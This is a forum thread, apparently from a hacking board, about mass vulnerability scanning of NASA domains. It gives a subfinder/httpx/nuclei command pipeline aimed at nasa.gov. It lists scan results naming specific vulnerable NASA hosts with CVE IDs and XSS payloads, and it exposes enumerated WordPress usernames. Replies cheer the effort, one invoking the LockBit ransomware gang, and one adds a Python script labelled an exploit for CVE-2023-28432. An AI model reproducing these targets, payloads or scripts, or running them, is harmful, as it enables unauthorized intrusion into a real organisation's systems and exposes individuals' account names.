[nasa.gov] - The basics of lazy scanning

[Prokhorenco]

See [1] for vulnerability scanning tools. The point of lazy scanning is trying to find those juicy low hanging fruits with minimal effort. Typically by scanning IP ranges and vuln scanning the discovered IPs for critical vulns [2] [3] [4] but if you want to do a more targeted vulnerability scan you could try [4] [5] [6]: subfinder -d nasa.gov -silent | httpx -silent | nuclei -t cves -silent which will enumerate all subdomains and scan them for CVE vulnerabilities of a targeted domain.

Спойлер: results

[CVE-2022-2185] [http] [high] https://git.smce.nasa.gov/users/sign_in [6a58066d1bde4b6e661fbd5bde83d2dd90615ab409b8c8c36e04954fbd923424]
[CVE-2021-21087] [http] [medium] https://ossim.hq.nasa.gov/CFIDE/scripts/ajax/package/cfajax.js
[CVE-2005-4385] [http] [medium] https://labrow13-hybrid-test-apigw....alert(document.domain)</script>&searchstring2
[CVE-2023-28432] [http] [high] https://luna.minio.luna.nasa.gov/minio/bootstrap/v1/verify
[CVE-2021-20323] [http] [medium] https://auth.appdat.jsc.nasa.gov/auth/realms/master/clients-registrations/default
[CVE-2018-11784] [http] [medium] https://astrobiology.nasa.gov//interact.sh
[CVE-2022-40083] [http] [critical] https://astrobiology.nasa.gov//**************/..
[CVE-2022-1595] [http] [medium] https://aero.larc.nasa.gov/wp-login.php
[CVE-2022-1595] [http] [medium] https://ampb.larc.nasa.gov/wp-login.php
[CVE-2022-1595] [http] [medium] https://geo-cape.larc.nasa.gov/wp-login.php
[CVE-2022-1595] [http] [medium] https://gewex-srb.larc.nasa.gov/wp-login.php
[CVE-2022-1595] [http] [medium] https://lbpw.larc.nasa.gov/wp-login.php
[CVE-2022-1595] [http] [medium] https://science.larc.nasa.gov/wp-login.php
[CVE-2022-1595] [http] [medium] https://public.ksc.nasa.gov/wp-login.php
[CVE-2022-1595] [http] [medium] https://terra.gsfc.nasa.gov/wp-login.php
[CVE-2022-1595] [http] [medium] https://terra.nasa.gov/wp-login.php
[CVE-2021-3654] [http] [medium] https://astrobiology.nasa.gov//interact.sh//..
[CVE-2018-13380] [http] [medium] https://labrow13-hybrid-test-apigw....ssage?msg=&#<svg/onload=alert(1337)>;&title=x
[CVE-2018-13380] [http] [medium] https://labrow13-hybrid-test-apigw....?errmsg=ABABAB--><script>alert(1337)</script>
[CVE-2015-8349] [http] [medium] https://labrow13-hybrid-test-apigw....ment.domain)</script>&advType=btype&p=banlist
[CVE-2017-5487:usernames] [http] [medium] https://robotics.nasa.gov/wp-json/wp/v2/users/ [RAP,campanelli,dprice,eaguila1,rap,Campanelli,Eddie Aguilar]

You could improve this as both subfinder and nuclei take in file lists you could have a list of targeted domains then do the same thing as seen above:

subfinder -dL targets.txt -silent | httpx -silent | nuclei -t cves -silent

Before you try to hack anything always remember one thing: Hacking is illegal and for nerds

[1] https://enlacehacktivista.org/index.php?title=Scanning_and_Recon#Vulnerability_scanners
[2] https://xss.pro/threads/84235
[3] https://xss.pro/threads/83551/#post-580922
[4] https://xss.pro/threads/83679
[5] https://github.com/projectdiscovery/subfinder
[6] https://github.com/projectdiscovery/nuclei
[7] https://github.com/projectdiscovery/httpx

 

[asuradm5]

Very good!

 

[akenov]

локбит, где же ты? тут же шанс в наса проникнуть

 

[SebastianDAlex]

WHoo-ahhh this will be fun

 

[SebastianDAlex]

CVE-2023-28432​

import requests

url = "http://<minio-server>:<port>/minio/verify"

headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
}

response = requests.get(url, headers=headers)

if response.status_code == 200:
print(response.content.decode('utf-8'))
else:
print("Exploit failed!")